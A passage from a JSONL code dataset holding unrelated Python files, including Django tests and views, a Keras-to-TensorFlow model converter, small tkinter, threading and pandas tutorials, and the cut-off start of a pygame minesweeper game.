url)\n\n # A little additional setup \n # doc.rev is u'00' per the test setup - double-checking that here - if it fails, the breakage is in setUp\n self.assertEqual(doc.rev,u'00')\n path = os.path.join(settings.STATUS_CHANGE_PATH, '%s-%s.txt' % (doc.canonical_name(), doc.rev))\n with open(path,'w') as f:\n f.write('This is the old proposal.')\n f.close()\n # Put the old proposal into IESG review (exercises ballot tab when looking at an older revision below)\n state_change_url = urlreverse('ietf.doc.views_status_change.change_state',kwargs=dict(name=doc.name))\n iesgeval_pk = str(State.objects.get(slug='iesgeval',type__slug='statchg').pk)\n r = self.client.post(state_change_url,dict(new_state=iesgeval_pk))\n self.assertEqual(r.status_code, 302)\n\n # normal get\n r = self.client.get(url)\n self.assertEqual(r.status_code,200)\n q = PyQuery(r.content)\n self.assertTrue(q('textarea')[0].text.strip().startswith(\"This is the old proposal.\"))\n\n # faulty posts trying to use file upload\n # Copied from wgtracker tests - is this really testing the server code, or is it testing\n # how client.post populates Content-Type?\n test_file = StringIO(\"\\x10\\x11\\x12\") # post binary file\n test_file.name = \"unnamed\"\n r = self.client.post(url, dict(txt=test_file,submit_response=\"1\"))\n self.assertEqual(r.status_code, 200)\n self.assertTrue(\"does not appear to be a text file\" in unicontent(r))\n\n # sane post uploading a file\n test_file = StringIO(\"This is a new proposal.\")\n test_file.name = \"unnamed\"\n r = self.client.post(url,dict(txt=test_file,submit_response=\"1\"))\n self.assertEqual(r.status_code, 302)\n doc = Document.objects.get(name='status-change-imaginary-mid-review')\n self.assertEqual(doc.rev,u'01')\n path = os.path.join(settings.STATUS_CHANGE_PATH, '%s-%s.txt' % (doc.canonical_name(), doc.rev))\n with open(path) as f:\n self.assertEqual(f.read(),\"This is a new proposal.\")\n f.close()\n self.assertTrue( \"mid-review-01\" in doc.latest_event(NewRevisionDocEvent).desc)\n\n # verify reset text button works\n r = self.client.post(url,dict(reset_text=\"1\"))\n self.assertEqual(r.status_code, 200)\n q = PyQuery(r.content)\n self.assertTrue(q('textarea')[0].text.strip().startswith(\"Provide a description\"))\n\n # make sure we can see the old revision\n url = urlreverse('ietf.doc.views_doc.document_main',kwargs=dict(name=doc.name,rev='00'))\n r = self.client.get(url)\n self.assertEqual(r.status_code,200)\n self.assertTrue(\"This is the old proposal.\" in unicontent(r))\n\n def setUp(self):\n DocumentFactory(type_id='statchg',name='status-change-imaginary-mid-review',notify='notify@example.org')\n self.test_dir = self.tempdir('status-change')\n self.saved_status_change_path = settings.STATUS_CHANGE_PATH\n settings.STATUS_CHANGE_PATH = self.test_dir\n\n def tearDown(self):\n settings.STATUS_CHANGE_PATH = self.saved_status_change_path\n shutil.rmtree(self.test_dir)\n","sub_path":"ietf/doc/tests_status_change.py","file_name":"tests_status_change.py","file_ext":"py","file_size_in_byte":25120,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"133335292","text":"class MongoVenue(object):\n\n\tdef __init__(self, venue_id, lat, lon):\n\t\t\"\"\"Initialize a MongoVenue object to allow for spatial\n\t\toperations within the MongoDB instance.\n\t\t\"\"\"\n\t\tself.venue_id = str(venue_id)\n\t\tself.lat = float(lat)\n\t\tself.lon = float(lon)\n\n\ndef encode_venue(venue):\n\treturn { \"_type\": \"venue\", \"id\": venue.venue_id,\n\t\t\t 
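# MongoDB's 2dsphere queries expect GeoJSON ordering, [longitude, latitude],
# the reverse of the colloquial "lat, lon". The pair below is built lon-first,
# and decode_venue unpacks it in the same order, so a venue survives an
# encode/decode round trip with its axes intact.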
\"loc\": { \n\t\t\t \t\"type\": \"Point\",\n\t\t\t \t\"coordinate\": [ venue.lon, venue.lat ] \n\t\t\t }\n\t\t\t}\n\ndef decode_venue(document):\n\tassert document[\"_type\"] == \"venue\"\n\tlat = document[\"loc\"][\"coordinate\"][1]\n\tlon = document[\"loc\"][\"coordinate\"][0]\n\treturn MongoVenue(document[\"id\"], lat, lon)","sub_path":"maestro/utils/spatial.py","file_name":"spatial.py","file_ext":"py","file_size_in_byte":612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"244394129","text":"from django.shortcuts import render\nfrom urllib.request import urlopen\nfrom blogs.models import BlogTheme\nimport re\nfrom bs4 import BeautifulSoup\nfrom news.models import News\n\n\ndef home_page(request):\n themes = BlogTheme.objects.all()\n news_objects = News.objects.all().order_by('-date')[:5]\n context = {\n 'themes': themes,\n 'news_objects': news_objects}\n return render(request, 'energy_kalk/index.html', context)\n\n\ndef calculator(request):\n themes = BlogTheme.objects.all()\n if request.method == 'POST':\n\n city_data = {'Ужгород': (1.6, 162), 'Київ': (-1.1, 187)}\n wall_material_data = {'Селікатна цегла': 0.76, 'Суцільна цегла': 0.7,\n 'Пустотіла цегла': 0.52, 'Керамзитобетон': 0.44}\n ceiling_floor_material_data = {'Бетон': 1.7, 'Дерево': 0.13}\n\n length = float(request.POST['hause_length'])\n width = float(request.POST['hause_width'])\n height = float(request.POST['hause_height'])\n city = request.POST['city']\n\n wall_material = request.POST['wall_material']\n wall_thickness = float(request.POST['wall_thickness'])\n\n ceiling_material = request.POST['ceiling_material']\n ceiling_thickness = float(request.POST['ceiling_thickness'])\n\n window_area = float(request.POST['area_windows'])\n\n floor_material = request.POST['floor_material']\n floor_thickness = float(request.POST['floor_thickness'])\n\n def wall_area(length, height, width):\n area = ((length * height) * 2 + (width * height) * 2) - window_area\n return area\n\n def koefi(thick, mater, ins_thickness, ins_material_a):\n koef = 1 / (thick / mater)\n koef_ins = 1 / ((thick / mater) + (ins_thickness / ins_material_a))\n return koef, koef_ins\n\n def wall_loss(area, koef):\n q = (((\n koef[0] * area *\n (18 - city_data[str(city)][0])) / 1000) *\n 24 * city_data[str(city)][1]) / 9.45\n q_kw = ((\n koef[0] * area * (18 - city_data[str(city)][0])) /\n 1000) * 24 * city_data[str(city)][1]\n return q, q_kw\n\n def window_loss(window_area):\n win_loss_kw = (((\n 132 * window_area) / 1000) * 24) * city_data[str(city)][1]\n win_loss = ((((\n 132 * window_area) / 1000) * 24) *\n city_data[str(city)][1]) / 9.45\n return win_loss, win_loss_kw\n\n def en_loss(length, width, koef, loss_koef):\n loss_kw = (((\n length * width) * koef[0] * loss_koef * (18 - 8)) /\n 1000) * 24 * city_data[str(city)][1]\n loss = ((((\n length * width) * koef[0] * loss_koef * (18 - 8)) /\n 1000) * 24 * city_data[str(city)][1]) / 9.45\n loss_ins = ((((\n length * width) * koef[1] * loss_koef * (18 - 8)) /\n 1000) * 24 * city_data[str(city)][1]) / 9.45\n return loss, loss_kw, loss_ins\n\n def gas_price(sum_loss, sum_loss_ins):\n if sum_loss > 1200:\n result = 1200 * 3.6 + (sum_loss - 1200) * 7.8\n else:\n result = sum_loss * 3.6\n\n if sum_loss_ins > 1200:\n result_ins = 1200 * 3.6 + (sum_loss_ins - 1200) * 7.8\n else:\n result_ins = sum_loss_ins * 3.6\n return result, result_ins\n\n def min_price_pars(url):\n page = urlopen(url)\n page_obj = BeautifulSoup(page, \"html.parser\")\n price_page_pars = 
page_obj.find('div', 'items-wrapper grid')\\\n .find('div', 'price')\n min_price = re.search(r'\\d+.\\d+', price_page_pars.text).group(0)\n\n area_units_pars = page_obj.find('div', 'info')\n area_units_pars = re.findall(\n r'Площа одиниці - \\d+.\\d+', area_units_pars.text)\n for elem in area_units_pars:\n area = re.search(r'\\d+.\\d+', elem).group(0)\n\n title = page_obj.find('div', 'title')\n style_atrib = page_obj.find('a', 'bx_catalog_item_images')['style']\n href_atrib = page_obj.find('a', 'bx_catalog_item_images')['href']\n\n image_url = 'http://nl.ua' + re.search(\n r'/upload/[a-z, 0-9, \\s, \\S]*.jpg', style_atrib).group(0)\n material_link = 'http://nl.ua' + re.search(\n r'.+', href_atrib).group(0)\n\n return (min_price, area, title, image_url, material_link)\n\n def total_price_ins(price, area_units, area):\n numb_insulation = round(float(area) / float(area_units))\n result = float(price) * numb_insulation\n return result\n '''\n wall loss\n '''\n wall_area = wall_area(length, height, width)\n walls_koef = koefi(\n wall_thickness, wall_material_data[wall_material], 0, 1)\n q_wall = wall_loss(wall_area, walls_koef)[0]\n q_wall_kw = wall_loss(wall_area, walls_koef)[1]\n\n '''\n widnows loss\n '''\n q_window, q_window_kw = window_loss(window_area)[0],\\\n window_loss(window_area)[1]\n\n '''\n loss ceiling\n '''\n ceiling_koef = koefi(\n ceiling_thickness,\n ceiling_floor_material_data[ceiling_material],\n 0.05, 0.048)\n q_ceiling = en_loss(length, width, ceiling_koef, 1)[0]\n q_ceiling_kw = en_loss(length, width, ceiling_koef, 1)[1]\n q_ceiling_ins = en_loss(length, width, ceiling_koef, 1)[2]\n\n '''\n loss floors\n '''\n floor_koef = koefi(\n floor_thickness,\n ceiling_floor_material_data[floor_material],\n 0.05, 0.048)\n q_floor = en_loss(length, width, floor_koef, 1)[0]\n q_floor_kw = en_loss(length, width, floor_koef, 1)[1]\n q_floor_ins = en_loss(length, width, floor_koef, 1)[2]\n\n sum_loss = q_wall + q_window + q_ceiling + q_floor\n sum_loss_ins = q_wall + q_window + q_ceiling_ins + q_floor_ins\n\n '''\n gas price\n '''\n sum_gas_loss = gas_price(sum_loss, sum_loss_ins)[0]\n sum_gas_loss_ins = gas_price(sum_loss, sum_loss_ins)[1]\n\n '''\n parsing price\n '''\n price_un_area = min_price_pars('http://goo.gl/RS79DA')\n total_price = total_price_ins(\n price_un_area[0], price_un_area[1],\n (length * width) * 2)\n title = price_un_area[2].text\n image_url = price_un_area[3]\n insulation_link = price_un_area[4]\n\n context = {\n 'q_wall': round(q_wall, 2),\n 'q_wall_kw': round(q_wall_kw, 2),\n 'city_day': city_data[str(city)][1],\n 'window_area': window_area,\n 'wall_area': wall_area,\n 'q_window': round(q_window, 2),\n 'q_window_kw': round(q_window_kw, 2),\n 'q_ceiling': round(q_ceiling, 2),\n 'q_ceiling_kw': round(q_ceiling_kw, 2),\n 'q_floor': round(q_floor, 2),\n 'q_floor_kw': round(q_floor_kw, 2),\n 'sum_loss': round(sum_loss, 2),\n 'sum_gas_loss': round(sum_gas_loss, 2),\n 'sum_gas_loss_ins': round(sum_gas_loss_ins, 2),\n 'total_price': round(total_price, 2),\n 'title': title,\n 'image_url': image_url,\n 'insulation_link': insulation_link,\n 'nbar': 'kalkulator',\n 'themes': themes}\n\n return render(request, 'energy_kalk/kalkulator_result.html', context)\n context = {\n 'themes': themes}\n return render(request, 'energy_kalk/kalkulator.html', context)\n","sub_path":"energy_kalk/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7828,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} 
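# A minimal, self-contained sketch (not part of the view above) of the
# steady-state formula the calculator applies: U = 1 / (d / lambda) is the
# transmittance of one homogeneous layer, and Q = U * A * dT is the heat
# flow through it in watts. The numbers are illustrative only; 0.7 W/mK is
# the solid-brick conductivity that also appears in wall_material_data.

def u_value(thickness_m, conductivity_w_mk):
    # Single-layer transmittance; sum d/lambda terms per layer for sandwiches.
    return 1.0 / (thickness_m / conductivity_w_mk)

def heat_loss_w(u, area_m2, delta_t_k):
    # Watts lost through the element at the given temperature difference.
    return u * area_m2 * delta_t_k

if __name__ == '__main__':
    u = u_value(0.51, 0.7)  # 0.51 m solid-brick wall, assumed for the example
    print(round(heat_loss_w(u, 20.0, 19.0), 1), 'W')  # 20 m2 wall, 19 K drop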
+{"seq_id":"288663596","text":"\"\"\"\nWhat is a process?\n1. A process is a program in execution\n2. It has its own address space, memory, data stack, etc.\n3. It is managed by the operating system\n4. It derives (forks or spawns) new processes\n5. Processes share information via inter-process communication (IPC)\n\nWhat is a thread?\n1. Threads execute within one process and share the same context\n2. Sharing information and communicating between threads is easier\n3. Multiple threads run concurrently (not at the same instant: the threads take turns executing)\n4. Synchronization primitives are needed\n\nPython and threads\n1. The interpreter has a main loop\n2. Only one thread of control runs in the main loop at any time\n3. It uses a global interpreter lock (GIL)\n\nPython thread management\n_thread: provides basic threads and locks\nthreading: provides higher-level, more fully featured thread management\n1. Supports synchronization mechanisms\n2. Supports daemon threads\n\n\"\"\"\nimport _thread\nimport logging\nfrom time import sleep, ctime\n\nlogging.basicConfig(level=logging.INFO)\n\nloops = [2, 4]\n\n\ndef loop(nloop, nsec, lock):\n logging.info(f\"start {nloop} at \" + ctime())\n sleep(nsec)\n logging.info(f\"end {nloop} at \" + ctime())\n lock.release()\n\n\ndef main():\n logging.info(\"start all at \" + ctime())\n locks = []\n nloops = range(len(loops))\n for i in nloops: # set up the locks\n lock = _thread.allocate_lock() # create a lock\n lock.acquire() # acquire (close) the lock\n locks.append(lock) # hand the lock over to the locks list\n\n for i in nloops: # start the threads\n _thread.start_new_thread(loop, (i, loops[i], locks[i]))\n\n for i in nloops: # wait until every lock has been released\n while locks[i].locked(): pass\n\n logging.info(\"end all at \" + ctime())\n # sleep(6) # unwritten rule of _thread: when the main thread ends, all child threads are killed outright (there is no daemon-thread concept), so the main thread would need a sleep here to guarantee the children also get to run\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"python Foundation/Python_Thread/Python_thread.py","file_name":"Python_thread.py","file_ext":"py","file_size_in_byte":1791,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"69011870","text":"from tkinter import *\nroot = Tk()\n\nvar1 = StringVar()\nvar2 = StringVar()\nopt1 = OptionMenu(root, var1, 'spam', 'eggs', 'toast') # like Menubutton\nopt2 = OptionMenu(root, var2, 'ham', 'bacon', 'sausage') # but it displays the selected option\nopt1.pack(fill = X)\nopt2.pack(fill = X)\nvar1.set('spam')\nvar2.set('ham')\n\ndef state(): print(var1.get(), var2.get())\n\nButton(root, command = state, text='state').pack()\nroot.mainloop()\n\n","sub_path":"Lutts/Gui/Tour/menu/optionmenu.py","file_name":"optionmenu.py","file_ext":"py","file_size_in_byte":462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"324435418","text":"import os\nimport subprocess\n\n# create folder in working directory with given name\ndef create_folder(folder_name):\n if not os.path.exists(folder_name):\n os.makedirs(folder_name)\n print('Folder \"' + folder_name + '\" created.')\n else:\n print('Folder \"' + folder_name + '\" already exists.')\n\n# image resize for source to result folder\ndef image_resize(source_folder, result_folder, resize_pixels):\n for image in os.listdir(source_folder):\n if os.path.splitext(image)[1] == '.jpg':\n from_file = os.path.join(source_folder, image)\n to_file = os.path.join(result_folder, image)\n command_line = 'convert ' + from_file + ' -resize ' + str(resize_pixels) + ' ' + to_file\n try:\n subprocess.run(command_line)\n print(command_line, ' ...done')\n except:\n print(command_line, ' ...error')\n\nsource_folder = 'Source'\nresult_folder = 'Result'\n\ncreate_folder(result_folder)\nimage_resize(source_folder, result_folder, 200)\n","sub_path":"task_2.5/task_2.5.py","file_name":"task_2.5.py","file_ext":"py","file_size_in_byte":1039,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"296457435","text":"import pymysql\nimport pandas as pd\nimport matplotlib.pyplot as plt\n# connect to the MySQL database, specifying the password (passwd) and database (db)\nconn = pymysql.connect(host = \"localhost\",user = 'root',passwd ='root',db = 'test',charset=\"utf8\")\nsql_query = 'SELECT * FROM 
test.user' # SQL query\ndata = pd.read_sql(sql_query, con=conn) # read the MySQL data\nconn.close() # close the database connection\ndata=data[['username','addtime']] # keep only the needed columns\ndata.rename(columns = {'addtime':'注册日期','username':'用户数量'},inplace=True) # rename the columns\ndata['注册日期'] = pd.to_datetime(data['注册日期']) # convert the column to datetime\ndata = data.set_index('注册日期') # use the date as the index\n# count each year's registered users by month\nindex=['1月','2月','3月','4月','5月','6月','7月','8月','9月','10月','11月','12月']\ndf_2017=data['2017']\ndf_2017=df_2017.resample('M').size().to_period('M')\ndf_2017.index=index\ndf_2018=data['2018']\ndf_2018=df_2018.resample('M').size().to_period('M')\ndf_2018.index=index\ndf_2019=data['2019']\ndf_2019=df_2019.resample('M').size().to_period('M')\ndf_2019.index=index\ndfs=pd.concat([df_2017,df_2018,df_2019],axis=1)\n# set the column labels\ndfs.columns=['2017年','2018年','2019年']\ndfs.to_excel('result2.xlsx',index=False)# export the data to an Excel file\n# draw the line chart\nplt.rcParams['font.sans-serif']=['SimHei'] # render Chinese labels correctly\nplt.title('年度注册用户分析图')\nx=index\ny1=dfs['2017年']\ny2=dfs['2018年']\ny3=dfs['2019年']\nplt.plot(x,y1,label='2017年',color='b',marker='o')\nplt.plot(x,y2,label='2018年',color='g',marker='o')\nplt.plot(x,y3,label='2019年',color='r',marker='o')\n# add text labels\nfor a,b1,b2,b3 in zip(x,y1,y2,y3):\n plt.text(a,b1+200,b1,ha = 'center',va = 'bottom',fontsize=8)\n plt.text(a,b2+100,b2,ha='center', va='bottom', fontsize=8)\n plt.text(a,b3+200,b3,ha='center', va='bottom', fontsize=8)\nx = range(0, 12, 1)\nplt.xlabel('注册日期')\nplt.ylabel('用户数量')\nplt.legend()\nplt.show()\n","sub_path":"Python数据分析从入门到精通/MR/Code/11/data_year.py","file_name":"data_year.py","file_ext":"py","file_size_in_byte":2005,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"283702563","text":"from django.conf.urls import patterns, url, include\nfrom .views import logs, Index, activeprocesses, diskinfo, raminfo, netinfo, netinfolist, getipfromhost\n\n\n\nurlpatterns = patterns('',\n # Does not work\n # Login / Logout\n #url(r'^login/$', 'login_user', name='login'),\n #url(r'^logout/$', 'logout_user', name='logout'),\n\n # Index\n # Make it nice\n url(r'^$', Index.as_view(), name='index'),\n # Works well\n url(r'^getipfromhost/$', getipfromhost, name='getipfromhost'), \n url(r'^activeprocesses/$', activeprocesses, name='activeprocesses'),\n url(r'^diskinfo/$', diskinfo, name='diskinfo'),\n url(r'^raminfo/$', raminfo, name='raminfo'),\n url(r'^netinfo/$', netinfo, name='netinfo'),\n url(r'^netinfolist/$', netinfolist, name='netinfolist'),\n # Diskspace\n #url(r'^diskspace/$', machinePanel, name='machinePanel'),\n\n # Logs\n #url(r'^logs/$', logs, name='logs'),\n)\n\n\n\n\n\n\n\n","sub_path":"serverinfo/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":942,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"345502627","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n'''\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\nCopyright: Deutsches Zentrum fuer Luft- und Raumfahrt e.V., 2015 (c)\nContact: daniel.boehnke@dlr.de and 
jonas.jepsen@dlr.de\n'''\nfrom cmath import sqrt\n\nfrom VAMPzero.Handler.Parameter import parameter\n\n\nclass span(parameter):\n '''\n The span of the strut. It equals the distance from the root to the tip of the strut.\n \n :Unit: [m]\n '''\n\n def __init__(self, value=0., unit='m', parent='', cpacsPath=''):\n super(span, self).__init__(value=value, unit=unit, doc=self.__doc__, status='init', parent=parent,\n cpacsPath=cpacsPath)\n\n def calc(self):\n '''\n Calculates the strut span from its root and tip xyz-locations.\n '''\n xRoot = self.parent.xRoot.getValue()\n yRoot = self.parent.yRoot.getValue()\n zRoot = self.parent.zRoot.getValue()\n \n xTip = self.parent.xTip.getValue()\n yTip = self.parent.yTip.getValue()\n zTip = self.parent.zTip.getValue()\n\n return self.setValueCalc(sqrt((xRoot-xTip)**2+(yRoot-yTip)**2+(zRoot-zTip)**2))\n\n ###################################################################################################\n #EOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFE#\n ###################################################################################################","sub_path":"src/VAMPzero/Component/Strut/Geometry/span.py","file_name":"span.py","file_ext":"py","file_size_in_byte":1961,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"433161882","text":"#!/usr/bin/env python\n#coding:utf-8\n\n\"\"\"\n\nNAME:函数的离开练习.py\nAuthor:YuTao\nConnetc:616637861@qq.com\nDate:2018-05-05\nDesc:\n\n\n\n\n\"\"\"\n#number = int(input(\"输入一个数字:\"))\n\n\ndef collatz(number):\n if number%2 == 0:\n return number//2\n else:\n return 3*number+1\n\n\n\ndef main():\n num = int(input(\"输入一个数字:\"))\n while True:\n if collatz(num) == 1:\n print(1)\n break\n else:\n num = collatz(num)\n print(num)\n\n\nmain()\n","sub_path":"Python_training/day6/myfile/day_05/函数的离开练习.py","file_name":"函数的离开练习.py","file_ext":"py","file_size_in_byte":511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"573978722","text":"from django.db import models\nfrom mptt.models import MPTTModel\nfrom mptt.fields import TreeForeignKey, TreeManyToManyField\nfrom utils.models import CreationModificationDateMixin\n\n\nclass Plan(CreationModificationDateMixin, MPTTModel):\n title = models.CharField(\"Title\", max_length=250)\n notes = models.TextField(blank=True,)\n parent = TreeForeignKey(\"self\", blank=True, null=True)\n\n def __str__(self):\n return self.title\n\n class Meta:\n ordering = [\"tree_id\", \"lft\"]\n verbose_name = \"Plan\"\n verbose_name_plural = \"Plans\"\n\n\n\n","sub_path":"planning/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":565,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"586370533","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nThis script will convert tf.keras model file to\nTensorflow pb model.\n\"\"\"\nimport os\nimport ast\nimport argparse\n\nimport tensorflow as tf\nfrom tensorflow.keras import backend as K\nfrom tensorflow.keras.models import load_model\n\nK.set_learning_phase(False)\n\n\ndef freeze_session(session, keep_var_names=None, output_names=None, clear_devices=True):\n graph = session.graph\n with graph.as_default():\n freeze_var_names = list(set(v.op.name for v in tf.global_variables()).difference(keep_var_names or []))\n output_names = output_names or []\n output_names += [v.op.name for v in tf.global_variables()]\n 
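# Keeping every variable's op name in output_names stops the freezer from
# pruning those nodes; convert_variables_to_constants then bakes the
# session's current values into the GraphDef as Const nodes, so the exported
# model no longer needs a separate variables checkpoint.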
input_graph_def = graph.as_graph_def()\n if clear_devices:\n for node in input_graph_def.node:\n node.device = \"\"\n frozen_graph = tf.graph_util.convert_variables_to_constants(session, input_graph_def, output_names, freeze_var_names)\n return frozen_graph\n\n\ndef save_model(keras_model, session, pb_model_path):\n x = keras_model.input\n y = keras_model.output\n prediction_signature = tf.saved_model.signature_def_utils.predict_signature_def({\"inputs\": x}, {\"prediction\": y})\n builder = tf.saved_model.builder.SavedModelBuilder(pb_model_path)\n legacy_init_op = tf.group(tf.tables_initializer(), name='legacy_init_op')\n signature = {tf.saved_model.signature_constants.DEFAULT_SERVING_SIGNATURE_DEF_KEY: prediction_signature, }\n builder.add_meta_graph_and_variables(session, [tf.saved_model.tag_constants.SERVING], signature_def_map=signature, legacy_init_op=legacy_init_op)\n builder.save()\n\n\ndef run(keras_model_file, output_path):\n sess = K.get_session()\n model = load_model(keras_model_file)\n output_names = [node.op.name for node in model.outputs]\n _ = freeze_session(sess, output_names=output_names)\n save_model(keras_model=model, session=sess, pb_model_path=output_path)\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('--output_path', help='Full path of the output pb model.', type=str)\n parser.add_argument('--keras_model_file', help='Full filepath of HDF5 file containing tf.Keras model.', type=str)\n\n args = parser.parse_args()\n if not args.output_path:\n raise ValueError('output_path not specified')\n if not args.keras_model_file:\n raise ValueError('keras_model_file not specified')\n\n run(args.keras_model_file, args.output_path)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"tools/keras_to_tf.py","file_name":"keras_to_tf.py","file_ext":"py","file_size_in_byte":2494,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"559155159","text":"#Reading and writing to files\r\n\r\n\"\"\"\r\n'r' --->open files in read only mode\r\n'w' --->open file in write only mode or create file\r\n'w+' --->open file in a reading and writing modes\r\n'a' --->Append to a file\r\n\r\nwith-as ---> automaticaly closes the file for you\r\n\"\"\"\r\nfile_one = open(\"test.txt\", \"w\")\r\nfile_one.write(\"this is the first test with writing in a file \")\r\nfile_one.close()\r\n\r\n\r\n\r\nfile_one = open(\"test.xls\", \"w\")\r\nfile_one.write(\"this is the first test with writing in a file \")\r\nfile_one.close()\r\n\r\n\r\n#Automaticaly closes file for you\r\n\r\n# with open(\"Textfiletwo.txt\", \"a\") as demo_file:\r\n# demo_file.write(\"appended text\")\r\n\r\n","sub_path":"tutorial/writing_to_file.py","file_name":"writing_to_file.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"498427071","text":"import unittest\n\nimport unittest\nfrom flask import current_app, url_for\nfrom app import create_app, db\nfrom app.models import Post\n\n\nclass ViewTestCase(unittest.TestCase):\n def setUp(self):\n self.app = create_app('testing')\n self.app_context = self.app.app_context()\n self.app_context.push()\n db.create_all()\n self.client = self.app.test_client()\n\n def tearDown(self):\n db.session.remove()\n db.drop_all()\n self.app_context.pop()\n\n def test_home_page(self):\n response = self.client.get(url_for('main.index'))\n self.assertEqual(200, response.status_code)\n\n def test_get_a_post(self):\n post = Post(\n 
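# Minimal fixture: only the two fields the detail view is expected to render.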
title='title',\n body='body'\n )\n db.session.add(post)\n db.session.commit()\n\n response = self.client.get(url_for('main.post', pk=post.id))\n self.assertEqual(200, response.status_code)\n response_data = response.get_data()\n self.assertIn('body', response_data)\n self.assertIn('title', response_data)\n","sub_path":"tests/test_app_main/test_views.py","file_name":"test_views.py","file_ext":"py","file_size_in_byte":1060,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"320673310","text":"import pygame\r\nimport random\r\nfrom pygame.locals import*\r\nimport sys\r\n\r\npygame.init() # Pygameの初期化\r\nscreen = pygame.display.set_mode((630, 520))\r\nclock = pygame.time.Clock() # クロックの設定。異なるPCで異なる速さの動作になることを防ぐ\r\npygame.display.set_caption(\"4D MINESWEEPER\") # タイトルバーに表示する文字\r\nimg_bomb=pygame.image.load('datafile_4dms\\\\bomb.png')\r\nimg_bomb=pygame.transform.scale(img_bomb,(32,32))\r\npygame.display.set_icon(img_bomb)\r\n\r\nclass Linked_State:\r\n def __init__(self,parent,model):\r\n self.focused=False\r\n self.linklis=[]\r\n self.sublis=[]\r\n self.parent=parent\r\n self.model=model\r\n self.view=None\r\n \r\n def add_link(self,sobj):\r\n self.linklis.append(sobj)\r\n \r\n def add_substate(self,sobj):\r\n self.sublis.append(sobj)\r\n \r\n def focus(self):\r\n self.focused=True\r\n \r\n def add_model(self,model):\r\n self.model=model\r\n \r\n def set_view(self):\r\n return None\r\n \r\n def defocus(self):\r\n self.focused=False\r\n \r\n def submove(self,i):\r\n for a in range(len(self.sublis)):\r\n self.sublis[a].focused=False\r\n self.sublis[i].focused=True\r\n \r\n def get_focused(self):\r\n return self.focused\r\n \r\n def move(self,i):\r\n self.defocus()\r\n self.linklis[i].focus()\r\n \r\n def view_reinit(self,i):\r\n self.linklis[i].view.reinit()\r\n \r\n def act(self,s):\r\n return None\r\n \r\n def show(self):\r\n return None\r\n\r\nclass StateMachine:\r\n def __init__(self,model):\r\n self.statelis=[]\r\n self.model=model\r\n self.curstate=0\r\n self.mx=0\r\n self.my=0\r\n \r\n def add_state(self,sobj):\r\n self.statelis.append(sobj)\r\n \r\n def set_mpos(self,ax,ay):\r\n self.mx=ax\r\n self.my=ay\r\n \r\n def get_mpos(self):\r\n return (self.mx,self.my)\r\n \r\n def input_to_mes(self):\r\n ev=pygame.event.get()\r\n receive='not_det'\r\n for a in ev:\r\n if a.type==pygame.KEYDOWN:\r\n if a.key==97:#A\r\n receive='left'\r\n elif a.key==119:#W\r\n receive='up'\r\n elif a.key==100:#D\r\n receive='right'\r\n elif a.key==115:#S\r\n receive='down'\r\n elif a.key==122:\r\n receive='det'\r\n if a.type==pygame.MOUSEBUTTONDOWN:\r\n if a.button==1:\r\n receive='click_left'\r\n elif a.button==3:\r\n receive='click_right'\r\n ax,ay=a.pos\r\n self.set_mpos(ax,ay)\r\n \r\n return receive\r\n \r\n def act(self):\r\n s=self.input_to_mes()\r\n if self.statelis[self.curstate].get_focused()==True:\r\n self.statelis[self.curstate].act(s)\r\n else:\r\n c=0\r\n for a in self.statelis:\r\n if a.get_focused()==True:\r\n a.act(s)\r\n self.curstate=c\r\n break\r\n c+=1\r\n \r\n def show(self):\r\n if self.statelis[self.curstate]\\\r\n .get_focused()==True:\r\n self.statelis[self.curstate].show()\r\n else:\r\n c=0\r\n for a in self.statelis:\r\n if a.get_focused()==True:\r\n a.show()\r\n self.curstate=c\r\n break\r\n c+=1\r\n\r\nclass Model:\r\n def __init__(self):\r\n return None\r\n\r\nclass View:\r\n def __init__(self,parent,model):\r\n self.parent=parent\r\n self.model=model\r\n \r\n def act(self,receive):\r\n return None\r\n \r\n def show(self):\r\n 
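# Deliberate no-op in the base class: concrete views such as V_PlayMain
# and V_Gameover override show() to draw their own screen each frame.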
